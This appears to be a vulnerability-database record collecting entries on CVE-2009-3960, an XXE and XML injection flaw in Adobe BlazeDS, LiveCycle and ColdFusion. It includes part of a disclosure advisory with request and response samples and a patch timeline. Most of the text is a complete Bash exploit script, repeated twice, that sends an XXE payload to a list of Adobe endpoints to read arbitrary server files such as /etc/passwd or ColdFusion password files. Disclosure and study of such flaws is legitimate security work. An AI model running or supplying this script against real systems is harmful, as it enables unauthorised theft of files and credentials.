\nsync:x:4:65534:sync:/bin:/bin/sync \ngames:x:5:60:games:/usr/games:/bin/sh \nman:x:6:12:man:/var/cache/man:/bin/sh \nlp:x:7:7:lp:/var/spool/lpd:/bin/sh \n[...] \n \n \nThe above injection was successfully tested on \nmultiple Adobe products, as shown below: \n \n1. Product: Adobe BlazeDS 3.2.0.39 \nLinux Ubuntu 9.04 / Tomcat 6.0.14 \n \nEndpoint URIs: \n \n{server.name}:{server.port}/ \n{context.root}/messagebroker/http \n{server.name}:{server.port}/ \n{context.root}/messagebroker/httpsecure \n \nMethods: POST, GET \nProtocols: HTTP, HTTPS \n \n \n2. Adobe LiveCycle Data Services ES2 3.0 \nWindows XP SP2 / Tomcat 6.0.14 \n \nEndpoint URIs: \n \n{server.name}:{server.port}/ \n{context.root}/messagebroker/http \n{server.name}:{server.port}/ \n{context.root}/messagebroker/httpsecure \n \nMethods: POST, GET \nProtocols: HTTP, HTTPS \n \n3. ColdFusion 9.0 \nWindows XP SP2 / Tomcat 6.0.14 \n \nEndpoint URIs: \n \n{server.name}:{server.port}/ \n{context.root}/flex2gateway/http \n{server.name}:{server.port}/ \n{context.root}/flex2gateway/httpsecure \n \nMethods: POST, GET \nProtocols: HTTP, HTTPS \n \n4. Adobe LiveCycle ES2 \nWindows XP SP2 / IBM Websphere 7.0 \n \nEndpoint URIs: \n \n{server.name}:{server.port}/ \n{context.root}/messagebroker/http \n{server.name}:{server.port}/ \n{context.root}/messagebroker/httpsecure \n \nMethods: POST, GET \nProtocols: HTTP, HTTPS \n \nThe vendor has released several patches for this \nvulnerability. See the Solution section of this \ndocument for more information. \n \n+----------------------------+ \n|Exploitation - XML Injection| \n+----------------------------+ \n \nThe XML parser lacks of proper input and output \nvalidation controls. Security-Assessment.com managed \nto inject arbitrary XML content which was returned \nin the XML response. \nThe following table shows an XML injection in the \nBlazeDS HTTPChannel. The injected payload becomes \npart of the response. 
In this case, injection is \npossible via the \u201cresponseURI\u201d attribute. \n \nXMLInjection \u2013 BlazeDS - Request \n \nPOST /samples/messagebroker/http HTTP/1.1 \nContent-type: application/x-amf \n \n<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<amfx ver=\"3\"><body targetURI=\"\" responseURI=\"d\" injectedattr=\"anything\"><null/> \n</body></amfx> \n \nXMLInjection \u2013 BlazeDS - Response \n \n<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<amfx ver=\"3\"><body targetURI=\"d\" injectedattr=\"anything\" responseURI=\"\"><null/></body></amfx></body></amfx> \n \nThe above injection was successfully tested on \nmultiple Adobe products, as shown below: \n \n1. Product: Adobe BlazeDS 3.2.0.39 \nLinux Ubuntu 9.04 / Tomcat 6.0.14 \n \nEndpoint URIs: \n \n{server.name}:{server.port}/ \n{context.root}/messagebroker/http \n{server.name}:{server.port}/ \n{context.root}/messagebroker/httpsecure \n \nMethods: POST, GET \nProtocols: HTTP, HTTPS \n \n \n2. Adobe LiveCycle Data Services ES2 3.0 \nWindows XP SP2 / Tomcat 6.0.14 \n \nEndpoint URIs: \n \n{server.name}:{server.port}/ \n{context.root}/messagebroker/http \n{server.name}:{server.port}/ \n{context.root}/messagebroker/httpsecure \n \nMethods: POST, GET \nProtocols: HTTP, HTTPS \n \n3. ColdFusion 9.0 \nWindows XP SP2 / Tomcat 6.0.14 \n \nEndpoint URIs: \n \n{server.name}:{server.port}/ \n{context.root}/flex2gateway/http \n{server.name}:{server.port}/ \n{context.root}/flex2gateway/httpsecure \n \nMethods: POST, GET \nProtocols: HTTP, HTTPS \n \n4. Adobe LiveCycle ES2 \nWindows XP SP2 / IBM Websphere 7.0 \n \nEndpoint URIs: \n \n{server.name}:{server.port}/ \n{context.root}/messagebroker/http \n{server.name}:{server.port}/ \n{context.root}/messagebroker/httpsecure \n \nMethods: POST, GET \nProtocols: HTTP, HTTPS \n \n \nThe vendor has released several patches for this \nvulnerability. See the Solution section of this \ndocument for more information. 
\n \n \n+--------+ \n|Solution| \n+--------+ \n \nSecurity-Assessment.com follows responsible \ndisclosure and promptly contacted the vendor after \ndiscovering the issues. The vendor was contacted on \nthe 6th November 2009 and a reply was received on the \nsame day. The vendor released security patches on \nthe 11th February 2010. \n \nThe security patches can be downloaded at the \nfollowing website: \n \nhttp://www.adobe.com/support/security/bulletins/apsb10-05.html \n \n \n+------+ \n|Credit| \n+------+ \n \nDiscovered and advised to Adobe in \nNovember 2009 by Roberto Suggi Liverani of Security- \nAssessment.com. Personal Page: http://malerisch.net/ \n \nFor full details regarding this vulnerability \ndownload the PDF from our website: \n \nhttp://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf \n \n \n+---------+ \n|Greetings| \n+---------+ \n \nBug found at Hack in The Sun 2009, Waiheke Island. \n \n \n+-----------------------------+ \n|About Security-Assessment.com| \n+-----------------------------+ \n \nSecurity-Assessment.com is a New Zealand based world \nleader in web application testing, network security \nand penetration testing. Security-Assessment.com \nservices organisations across New Zealand, Australia, \nAsia Pacific, the United States and the United \nKingdom. 
\n \nRoberto Suggi Liverani \n \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/86558/adobexml-injection.txt"}, {"lastseen": "2017-04-11T23:24:40", "bulletinFamily": "exploit", "description": "", "modified": "2017-04-11T00:00:00", "published": "2017-04-11T00:00:00", "href": "https://packetstormsecurity.com/files/142096/Adobe-XML-Injection-File-Content-Disclosure.html", "id": "PACKETSTORM:142096", "type": "packetstorm", "title": "Adobe XML Injection File Content Disclosure", "sourceData": "`#!/bin/bash \n# \n# Source: https://raw.githubusercontent.com/tsluyter/exploits/master/adobe_xml_inject.sh \n# Exploit Title: Adobe XML Injection file content disclosure \n# Date: 07-04-2017 \n# Exploit Author: Thomas Sluyter \n# Website: https://www.kilala.nl \n# Vendor Homepage: http://www.adobe.com/support/security/bulletins/apsb10-05.html \n# Version: Multiple Adobe products \n# Tested on: Windows Server 2003, ColdFusion 8.0 Enterprise \n# CVE : 2009-3960 \n# \n# Shell script that lets you exploit a known XML injection vulnerability \n# in a number of Adobe products, allowing you to read files that are otherwise \n# inaccessible. In Metasploit, this is achieved with auxiliary:scanner:adobe_xml_inject \n# This script is a Bash implementation of the PoC multiple/dos/11529.txt. 
\n# \n# According to the original Metasploit code, this attack works with: \n# \"Multiple Adobe Products: BlazeDS 3.2 and earlier versions, \n# LiveCycle 9.0, 8.2.1, and 8.0.1, LiveCycle Data Services 3.0, 2.6.1, \n# and 2.5.1, Flex Data Services 2.0.1, ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2\" \n# \n \n \nPROGNAME=\"$(basename $0)\" # This script \nTIMESTAMP=$(date +%y%m%d%H%M) # Used for scratchfiles \nSCRATCHFILE=\"/tmp/${PROGNAME}.${TIMESTAMP}\" # Used as generic scratchfile \nEXITCODE=\"0\" # Assume success, changes on errors \nCURL=\"/usr/bin/curl\" # Other locations are detected with \"which\" \n \nSSL=\"0\" # Overridden by -s \nDEBUG=\"0\" # Overridden by -d \nBREAKFOUND=\"0\" # Overridden by -b \nTARGETHOST=\"\" # Overridden by -h \nTARGETPORT=\"8400\" # Overridden by -p \nREADFILE=\"/etc/passwd\" # Overridden by -f \n \n \n################################## OVERHEAD SECTION \n# \n# Various functions for overhead purposes. \n# \n \n# Defining our own logger function, so we can switch between stdout and syslog. \nlogger() { \nLEVEL=\"$1\" \nMESSAGE=\"$2\" \n \n# You may switch the following two, if you need to log to syslog. \n#[[ ${DEBUG} -gt 0 ]] && echo \"${LEVEL} $MESSAGE\" || /usr/bin/logger -p ${LEVEL} \"$MESSAGE\" \n[[ ${DEBUG} -gt 0 ]] && echo \"${LEVEL} $MESSAGE\" || echo \"${LEVEL} $MESSAGE\" \n} \n \n \nExitCleanup() { \nEXITCODE=${1} \nrm -f ${SCRATCHFILE}* >/dev/null 2>&1 \necho \"\" \nexit ${EXITCODE} \n} \n \n \n# Many thanks to http://www.linuxjournal.com/content/validating-ip-address-bash-script \nValidIP() { \nlocal IP=${1} \nlocal STAT=1 \n \nif [[ ${IP} =~ ^[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}$ ]] \nthen \nOIFS=$IFS; IFS='.' \nIP=(${IP}) \nIFS=$OIFS \n[[ (${IP[0]} -le 255) && (${IP[1]} -le 255) && (${IP[2]} -le 255) && (${IP[3]} -le 255) ]] \nstat=$? \nfi \nreturn $stat \n} \n \n \n# Function to output help information. \nshow-help() { \necho \"\" \ncat << EOF \n${PROGNAME} [-?] 
[-d] [-s] [-b] -h host [-p port] [-f file] \n \n-? Show this help message. \n-d Debug mode, outputs more kruft on stdout. \n-s Use SSL / HTTPS, instead of HTTP. \n-b Break on the first valid answer found. \n-h Target host \n-p Target port, defaults to 8400. \n-f Full path to file to grab, defaults to /etc/passwd. \n \nThis script exploits a known vulnerability in a set of Adobe applications. Using one \nof a few possible URLs on the target host (-h) we attempt to read a file (-f) that is \nnormally inaccessible. \n \nNOTE: Windows paths use \\\\, so be sure to properly escape them when using -f! For example: \n${PROGNAME} -h 192.168.1.20 -f c:\\\\\\\\coldfusion8\\\\\\\\lib\\\\\\\\password.properties \n${PROGNAME} -h 192.168.1.20 -f 'c:\\\\coldfusion8\\\\lib\\\\password.properties' \n \nThis script relies on CURL, so please have it in your PATH. \n \nEOF \n} \n \n \n# Parsing and verifying the passed parameters. \nOPTIND=1 \nwhile getopts \"?dsbh:p:f:\" opt; do \ncase \"$opt\" in \n\\?) show-help; ExitCleanup 0 ;; \nd) DEBUG=\"1\" ;; \ns) SSL=\"1\" ;; \nb) BREAKFOUND=\"1\" ;; \nh) [[ -z ${OPTARG} ]] && (show-help; ExitCleanup 1) \nValidIP ${OPTARG}; if [[ $? -eq 0 ]] \nthen TARGETHOST=${OPTARG} \nelse TARGETHOST=$(nslookup ${OPTARG} | grep ^Name | awk '{print $2}') \n[[ $? -gt 0 ]] && (logger ERROR \"Target host ${TARGETHOST} not found in DNS.\"; ExitCleanup 1) \nfi ;; \np) [[ -z ${OPTARG} ]] && (show-help; ExitCleanup 1) \nif [[ ! 
-z $(echo ${OPTARG} | tr -d '[:alnum:]') ]] \nthen logger ERROR \"Target port ${OPTARG} is incorrect.\"; ExitCleanup 1 \nelse TARGETPORT=${OPTARG} \nfi ;; \nf) [[ -z ${OPTARG} ]] && (show-help; ExitCleanup 1) \nif [[ (-z $(echo ${OPTARG} | grep ^\\/)) && (-z $(echo ${OPTARG} | grep ^[a-Z]:)) ]] \nthen logger ERROR \"File is NOT specified with full Unix or Windows path.\"; ExitCleanup 1 \nelse READFILE=${OPTARG} \nfi ;; \n*) show-help; ExitCleanup 0 ;; \nesac \ndone \n \n[[ $(which curl) ]] && CURL=$(which curl) || (logger ERROR \"CURL was not found.\"; ExitCleanup 1) \n[[ -z ${TARGETHOST} ]] && (logger ERROR \"Target host was not set.\"; ExitCleanup 1) \n \n[[ ${DEBUG} -gt 0 ]] && logger DEBUG \"Proceeding with host/port/file: ${TARGETHOST},${TARGETPORT},${READFILE}.\" \n \n \n################################## GETTING TO WORK \n# \n# \n \nPATHLIST=(\"/flex2gateway/\" \"/flex2gateway/http\" \"/flex2gateway/httpsecure\" \\ \n\"/flex2gateway/cfamfpolling\" \"/flex2gateway/amf\" \"/flex2gateway/amfpolling\" \\ \n\"/messagebroker/http\" \"/messagebroker/httpsecure\" \"/blazeds/messagebroker/http\" \\ \n\"/blazeds/messagebroker/httpsecure\" \"/samples/messagebroker/http\" \\ \n\"/samples/messagebroker/httpsecure\" \"/lcds/messagebroker/http\" \\ \n\"/lcds/messagebroker/httpsecure\" \"/lcds-samples/messagebroker/http\" \\ \n\"/lcds-samples/messagebroker/httpsecure\") \n \necho \"<?xml version=\\\"1.0\\\" encoding=\\\"utf-8\\\"?>\" > ${SCRATCHFILE} \necho \"<!DOCTYPE test [ <!ENTITY x3 SYSTEM \\\"${READFILE}\\\"> ]>\" >> ${SCRATCHFILE} \necho \"<amfx ver=\\\"3\\\" xmlns=\\\"http://www.macromedia.com/2005/amfx\\\">\" >> ${SCRATCHFILE} \necho \"<body><object type=\\\"flex.messaging.messages.CommandMessage\\\"><traits>\" >> ${SCRATCHFILE} \necho \"<string>body</string><string>clientId</string><string>correlationId</string><string>destination</string>\" >> ${SCRATCHFILE} \necho 
\"<string>headers</string><string>messageId</string><string>operation</string><string>timestamp</string>\" >> ${SCRATCHFILE} \necho \"<string>timeToLive</string></traits><object><traits /></object><null /><string /><string /><object>\" >> ${SCRATCHFILE} \necho \"<traits><string>DSId</string><string>DSMessagingVersion</string></traits><string>nil</string>\" >> ${SCRATCHFILE} \necho \"<int>1</int></object><string>&x3;</string><int>5</int><int>0</int><int>0</int></object></body></amfx>\" >> ${SCRATCHFILE} \n \nif [[ ${DEBUG} -gt 0 ]] \nthen \nlogger DEBUG \"XML file sent to target host reads as follows:\" \necho \"======================================\" \ncat ${SCRATCHFILE} \necho \"======================================\" \necho \"\" \nfi \n \nlet CONTENTLENGTH=$(wc -c ${SCRATCHFILE} | awk '{print $1}')-1 \n \nfor ADOBEPATH in \"${PATHLIST[@]}\" \ndo \n[[ ${SSL} -gt 0 ]] && PROTOCOL=\"https\" || PROTOCOL=\"http\" \nURI=\"${PROTOCOL}://${TARGETHOST}:${TARGETPORT}${ADOBEPATH}\" \n \n[[ ${DEBUG} -gt 0 ]] && logger DEBUG \"Proceeding with URI: ${URI}\" \n \n# Header contents based on a tcpdump capture of original exploit being \n# run from Metasploit. \nHEADER=\"-H \\\"Host: ${TARGETHOST}\\\" -H \\\"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\\\" -H \\\"Content-Type: application/x-www-form-urlencoded\\\" -H \\\"Content-Length: ${CONTENTLENGTH}\\\"\" \n \nCURLPOST=\"${CURL} -X POST -k -s --http1.1 ${HEADER} -w \\\"%{http_code}\\\" -d @- ${URI}\" \n \n[[ ${DEBUG} -gt 0 ]] && logger DEBUG \"Using this CURL command: ${CURLPOST}\" \n \n# The tr command dikes out any non-ASCII characters which might mess with output. \nCURLOUTPUT=$(cat ${SCRATCHFILE} | ${CURLPOST} | tr -cd '\\11\\12\\15\\40-\\176' 2>&1) \n \n# Output is pretty garbled and the HTTP return code is enclosed in double quotes. \n# I need to grab the last 5 chars (includes NULL EOF) and remove the \". 
\nCURLCODE=$(echo ${CURLOUTPUT} | tail -c5 | tr -cd [:digit:]) \n \nif [[ ${DEBUG} -gt 0 ]] \nthen \nlogger DEBUG \"CURL was given this HTTP return code: ${CURLCODE}.\" \nlogger DEBUG \"Output from CURL reads as follows:\" \necho \"======================================\" \necho \"${CURLOUTPUT}\" \necho \"======================================\" \necho \"\" \nfi \n \nlogger INFO \"${CURLCODE} for ${URI}\" \n \nif [[ (${CURLCODE} -eq 200) && (! -z $(echo ${CURLOUTPUT} | grep \"<?xml version=\")) ]] \nthen \necho \"Read from ${URI}:\" \necho \"${CURLOUTPUT}\" | sed 's/^[^<]*</</' \n[[ ${BREAKFOUND} -gt 0 ]] && ExitCleanup 0 \nfi \n \nif [[ ${DEBUG} -gt 0 ]] \nthen \necho -e \"\\nReady to continue with the next URI? [y/n]: \\c\" \nread READY \ncase ${READY} in \ny|Y|yes) logger DEBUG \"Moving to next URI.\"; echo \"\" ;; \n*) logger DEBUG \"Aborting...\"; ExitCleanup 1 ;; \nesac \nfi \ndone \n \n \nExitCleanup 0 \n \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/142096/adobe-inject.txt"}], "zdt": [{"lastseen": "2018-03-20T00:14:06", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category web applications", "modified": "2017-04-11T00:00:00", "published": "2017-04-11T00:00:00", "href": "https://0day.today/exploit/description/27568", "id": "1337DAY-ID-27568", "title": "Adobe Multiple Products - XML Injection File Content Disclosure Exploit", "type": "zdt", "sourceData": "#!/bin/bash\r\n#\r\n# Source: https://raw.githubusercontent.com/tsluyter/exploits/master/adobe_xml_inject.sh\r\n# Exploit Title: Adobe XML Injection file content disclosure\r\n# Date: 07-04-2017\r\n# Exploit Author: Thomas Sluyter\r\n# Website: https://www.kilala.nl\r\n# Vendor Homepage: http://www.adobe.com/support/security/bulletins/apsb10-05.html\r\n# Version: Multiple Adobe products\r\n# Tested on: Windows Server 2003, ColdFusion 8.0 Enterprise\r\n# CVE : 
2009-3960\r\n#\r\n# Shell script that let's you exploit a known XML injection vulnerability\r\n# in a number of Adobe products, allowing you to read files that are otherwise\r\n# inaccessible. In Metasploit, this is achieved with auxiliary:scanner:adobe_xml_inject\r\n# This script is a Bash implementation of the PoC multiple/dos/11529.txt.\r\n#\r\n# According to the original Metasploit code, this attack works with:\r\n# \"Multiple Adobe Products: BlazeDS 3.2 and earlier versions, \r\n# LiveCycle 9.0, 8.2.1, and 8.0.1, LiveCycle Data Services 3.0, 2.6.1,\r\n# and 2.5.1, Flex Data Services 2.0.1, ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2\"\r\n#\r\n \r\n \r\nPROGNAME=\"$(basename $0)\" # This script\r\nTIMESTAMP=$(date +%y%m%d%H%M) # Used for scratchfiles\r\nSCRATCHFILE=\"/tmp/${PROGNAME}.${TIMESTAMP}\" # Used as generic scratchfile\r\nEXITCODE=\"0\" # Assume success, changes on errors\r\nCURL=\"/usr/bin/curl\" # Other locations are detected with \"which\"\r\n \r\nSSL=\"0\" # Overridden by -s\r\nDEBUG=\"0\" # Overridden by -d\r\nBREAKFOUND=\"0\" # Overridden by -b\r\nTARGETHOST=\"\" # Overridden by -h\r\nTARGETPORT=\"8400\" # Overridden by -p\r\nREADFILE=\"/etc/passwd\" # Overridden by -f\r\n \r\n \r\n################################## OVERHEAD SECTION \r\n# \r\n# Various functions for overhead purposes.\r\n#\r\n \r\n# Defining our own logger function, so we can switch between stdout and syslog.\r\nlogger() {\r\n LEVEL=\"$1\"\r\n MESSAGE=\"$2\"\r\n \r\n # You may switch the following two, if you need to log to syslog.\r\n #[[ ${DEBUG} -gt 0 ]] && echo \"${LEVEL} $MESSAGE\" || /usr/bin/logger -p ${LEVEL} \"$MESSAGE\"\r\n [[ ${DEBUG} -gt 0 ]] && echo \"${LEVEL} $MESSAGE\" || echo \"${LEVEL} $MESSAGE\"\r\n}\r\n \r\n \r\nExitCleanup() {\r\n EXITCODE=${1} \r\n rm -f ${SCRATCHFILE}* >/dev/null 2>&1\r\n echo \"\"\r\n exit ${EXITCODE}\r\n}\r\n \r\n \r\n# Many thanks to http://www.linuxjournal.com/content/validating-ip-address-bash-script\r\nValidIP() {\r\n local IP=${1}\r\n local 
STAT=1\r\n \r\n if [[ ${IP} =~ ^[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}$ ]]\r\n then\r\n OIFS=$IFS; IFS='.'\r\n IP=(${IP})\r\n IFS=$OIFS\r\n [[ (${IP[0]} -le 255) && (${IP[1]} -le 255) && (${IP[2]} -le 255) && (${IP[3]} -le 255) ]]\r\n stat=$?\r\n fi\r\n return $stat\r\n}\r\n \r\n \r\n# Function to output help information.\r\nshow-help() {\r\n echo \"\"\r\n cat << EOF\r\n ${PROGNAME} [-?] [-d] [-s] [-b] -h host [-p port] [-f file]\r\n \r\n -? Show this help message.\r\n -d Debug mode, outputs more kruft on stdout.\r\n -s Use SSL / HTTPS, instead of HTTP.\r\n -b Break on the first valid answer found.\r\n -h Target host\r\n -p Target port, defaults to 8400.\r\n -f Full path to file to grab, defaults to /etc/passwd.\r\n \r\n This script exploits a known vulnerability in a set of Adobe applications. Using one \r\n of a few possible URLs on the target host (-h) we attempt to read a file (-f) that is\r\n normally inaccessible. \r\n \r\n NOTE: Windows paths use \\\\, so be sure to properly escape them when using -f! For example:\r\n ${PROGNAME} -h 192.168.1.20 -f c:\\\\\\\\coldfusion8\\\\\\\\lib\\\\\\\\password.properties\r\n ${PROGNAME} -h 192.168.1.20 -f 'c:\\\\coldfusion8\\\\lib\\\\password.properties'\r\n \r\n This script relies on CURL, so please have it in your PATH. \r\n \r\nEOF\r\n}\r\n \r\n \r\n# Parsing and verifying the passed parameters.\r\nOPTIND=1 \r\nwhile getopts \"?dsbh:p:f:\" opt; do\r\n case \"$opt\" in\r\n \\?) show-help; ExitCleanup 0 ;;\r\n d) DEBUG=\"1\" ;;\r\n s) SSL=\"1\" ;;\r\n b) BREAKFOUND=\"1\" ;;\r\n h) [[ -z ${OPTARG} ]] && (show-help; ExitCleanup 1)\r\n ValidIP ${OPTARG}; if [[ $? -eq 0 ]]\r\n then TARGETHOST=${OPTARG}\r\n else TARGETHOST=$(nslookup ${OPTARG} | grep ^Name | awk '{print $2}')\r\n [[ $? -gt 0 ]] && (logger ERROR \"Target host ${TARGETHOST} not found in DNS.\"; ExitCleanup 1)\r\n fi ;;\r\n p) [[ -z ${OPTARG} ]] && (show-help; ExitCleanup 1)\r\n if [[ ! 
-z $(echo ${OPTARG} | tr -d '[:alnum:]') ]]\r\n then logger ERROR \"Target port ${OPTARG} is incorrect.\"; ExitCleanup 1\r\n else TARGETPORT=${OPTARG}\r\n fi ;;\r\n f) [[ -z ${OPTARG} ]] && (show-help; ExitCleanup 1)\r\n if [[ (-z $(echo ${OPTARG} | grep ^\\/)) && (-z $(echo ${OPTARG} | grep ^[a-Z]:)) ]]\r\n then logger ERROR \"File is NOT specified with full Unix or Windows path.\"; ExitCleanup 1\r\n else READFILE=${OPTARG}\r\n fi ;;\r\n *) show-help; ExitCleanup 0 ;;\r\n esac\r\ndone\r\n \r\n[[ $(which curl) ]] && CURL=$(which curl) || (logger ERROR \"CURL was not found.\"; ExitCleanup 1)\r\n[[ -z ${TARGETHOST} ]] && (logger ERROR \"Target host was not set.\"; ExitCleanup 1)\r\n \r\n[[ ${DEBUG} -gt 0 ]] && logger DEBUG \"Proceeding with host/port/file: ${TARGETHOST},${TARGETPORT},${READFILE}.\"\r\n \r\n \r\n################################## GETTING TO WORK\r\n# \r\n#\r\n \r\nPATHLIST=(\"/flex2gateway/\" \"/flex2gateway/http\" \"/flex2gateway/httpsecure\" \\\r\n \"/flex2gateway/cfamfpolling\" \"/flex2gateway/amf\" \"/flex2gateway/amfpolling\" \\\r\n \"/messagebroker/http\" \"/messagebroker/httpsecure\" \"/blazeds/messagebroker/http\" \\\r\n \"/blazeds/messagebroker/httpsecure\" \"/samples/messagebroker/http\" \\\r\n \"/samples/messagebroker/httpsecure\" \"/lcds/messagebroker/http\" \\\r\n \"/lcds/messagebroker/httpsecure\" \"/lcds-samples/messagebroker/http\" \\\r\n \"/lcds-samples/messagebroker/httpsecure\")\r\n \r\necho \"<?xml version=\\\"1.0\\\" encoding=\\\"utf-8\\\"?>\" > ${SCRATCHFILE}\r\necho \"<!DOCTYPE test [ <!ENTITY x3 SYSTEM \\\"${READFILE}\\\"> ]>\" >> ${SCRATCHFILE}\r\necho \"<amfx ver=\\\"3\\\" xmlns=\\\"http://www.macromedia.com/2005/amfx\\\">\" >> ${SCRATCHFILE}\r\necho \"<body><object type=\\\"flex.messaging.messages.CommandMessage\\\"><traits>\" >> ${SCRATCHFILE}\r\necho \"<string>body</string><string>clientId</string><string>correlationId</string><string>destination</string>\" >> ${SCRATCHFILE}\r\necho 
\"<string>headers</string><string>messageId</string><string>operation</string><string>timestamp</string>\" >> ${SCRATCHFILE}\r\necho \"<string>timeToLive</string></traits><object><traits /></object><null /><string /><string /><object>\" >> ${SCRATCHFILE}\r\necho \"<traits><string>DSId</string><string>DSMessagingVersion</string></traits><string>nil</string>\" >> ${SCRATCHFILE}\r\necho \"<int>1</int></object><string>&x3;</string><int>5</int><int>0</int><int>0</int></object></body></amfx>\" >> ${SCRATCHFILE}\r\n \r\nif [[ ${DEBUG} -gt 0 ]] \r\nthen\r\n logger DEBUG \"XML file sent to target host reads as follows:\"\r\n echo \"======================================\"\r\n cat ${SCRATCHFILE}\r\n echo \"======================================\"\r\n echo \"\"\r\nfi\r\n \r\nlet CONTENTLENGTH=$(wc -c ${SCRATCHFILE} | awk '{print $1}')-1\r\n \r\nfor ADOBEPATH in \"${PATHLIST[@]}\"\r\ndo\r\n [[ ${SSL} -gt 0 ]] && PROTOCOL=\"https\" || PROTOCOL=\"http\"\r\n URI=\"${PROTOCOL}://${TARGETHOST}:${TARGETPORT}${ADOBEPATH}\"\r\n \r\n [[ ${DEBUG} -gt 0 ]] && logger DEBUG \"Proceeding with URI: ${URI}\"\r\n \r\n # Header contents based on a tcpdump capture of original exploit being\r\n # run from Metasploit.\r\n HEADER=\"-H \\\"Host: ${TARGETHOST}\\\" -H \\\"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\\\" -H \\\"Content-Type: application/x-www-form-urlencoded\\\" -H \\\"Content-Length: ${CONTENTLENGTH}\\\"\"\r\n \r\n CURLPOST=\"${CURL} -X POST -k -s --http1.1 ${HEADER} -w \\\"%{http_code}\\\" -d @- ${URI}\"\r\n \r\n [[ ${DEBUG} -gt 0 ]] && logger DEBUG \"Using this CURL command: ${CURLPOST}\"\r\n \r\n # The tr command dikes out any non-ASCII characters which might mess with output.\r\n CURLOUTPUT=$(cat ${SCRATCHFILE} | ${CURLPOST} | tr -cd '\\11\\12\\15\\40-\\176' 2>&1)\r\n \r\n # Output is pretty garbled and the HTTP return code is enclosed in double quotes.\r\n # I need to grab the last 5 chars (includes NULL EOF) and remove the \".\r\n CURLCODE=$(echo ${CURLOUTPUT} 
| tail -c5 | tr -cd [:digit:])\r\n \r\n if [[ ${DEBUG} -gt 0 ]] \r\n then\r\n logger DEBUG \"CURL was given this HTTP return code: ${CURLCODE}.\"\r\n logger DEBUG \"Output from CURL reads as follows:\"\r\n echo \"======================================\"\r\n echo \"${CURLOUTPUT}\"\r\n echo \"======================================\"\r\n echo \"\"\r\n fi\r\n \r\n logger INFO \"${CURLCODE} for ${URI}\"\r\n \r\n if [[ (${CURLCODE} -eq 200) && (! -z $(echo ${CURLOUTPUT} | grep \"<?xml version=\")) ]] \r\n then\r\n echo \"Read from ${URI}:\"\r\n echo \"${CURLOUTPUT}\" | sed 's/^[^<]*</</'\r\n [[ ${BREAKFOUND} -gt 0 ]] && ExitCleanup 0\r\n fi\r\n \r\n if [[ ${DEBUG} -gt 0 ]] \r\n then\r\n echo -e \"\\nReady to continue with the next URI? [y/n]: \\c\"\r\n read READY\r\n case ${READY} in\r\n y|Y|yes) logger DEBUG \"Moving to next URI.\"; echo \"\" ;;\r\n *) logger DEBUG \"Aborting...\"; ExitCleanup 1 ;;\r\n esac\r\n fi\r\ndone\r\n \r\n \r\nExitCleanup 0\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/27568"}], "dsquare": [{"lastseen": "2017-09-26T15:33:26", "bulletinFamily": "exploit", "description": "File disclosure vulnerability\n\nVulnerability Type: File Disclosure", "modified": "2013-04-02T00:00:00", "published": "2012-02-01T00:00:00", "id": "E-1", "href": "", "type": "dsquare", "title": "Adobe XML External Entity File Disclosure", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:33", "bulletinFamily": "software", "description": "\r\n ( , ) (,\r\n . `.' ) ('. ',\r\n ). , ('. ( ) (\r\n (_,) .`), ) _ _,\r\n / _____/ / _ \ ____ ____ _____ \r\n \____ \==/ /_\ \ _/ ___\/ _ \ / \ \r\n / \/ | \\ \__( <_> ) Y Y \\r\n/______ /\___|__ / \___ >____/|__|_| /\r\n \/ \/.-. 
\/ \/:wq \r\n (x.0)\r\n '=.|w|.='\r\n _='`"``=.\r\n\r\n presents..\r\n\r\nMultiple Adobe Products\r\nXML External Entity And XML Injection Vulnerabilities\r\n\r\nCVE: CVE-2009-3960\r\nAdobe PSIRT: APSB10-05 - http://www.adobe.com/support/security/bulletins/apsb10-05.html\r\nLink: http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf\r\n\r\n+-----------+\r\n|Description|\r\n+-----------+\r\n\r\nSecurity-Assessment.com discovered that multiple Adobe \r\nproducts with different Data Services versions are \r\nvulnerable to XML External Entity (XXE) and XML \r\ninjection attacks. \r\nXML external Entities injection allows a wide range of\r\nXML based attacks, including local file disclosure, \r\nTCP scans and Denial of Service condition, which can \r\nbe achieved by recursive entity injection, attribute \r\nblow up and other types of injection. \r\nFor more information about the implications associated\r\nto this vulnerability, refer to the RFC2518 (17.7 \r\nImplications of XML External Entities): \r\nhttp://www.ietf.org/rfc/rfc2518.txt\r\n\r\n+--------------+\r\n|Product Review|\r\n+--------------+\r\n\r\nAdobe Data Services components provide Flex/RIA \r\napplications with data messaging, remoting and \r\nmanagement capabilities.\r\n\r\nThe discovered vulnerabilities affect the HTTPChannel\r\n servlet classes which are respectively \r\n\u201cmx.messaging.channels.HTTPChannel\u201d and \r\n\u201cmx.messaging.channels.SecureHTTPChannel\u201d. These \r\nclasses are part of the Data Services Messaging \r\nclasses and can be found in the \r\nflex-messaging-common.jar Java archive.\r\n\r\nThe HTTPChannel transports data in the AMFX format, \r\nwhich is the text-based XML representation of AMF. \r\nThe HTTPChannel endpoints are defined in the \r\nservices-config.xml file, located within the \r\nFlex/WEB-INF 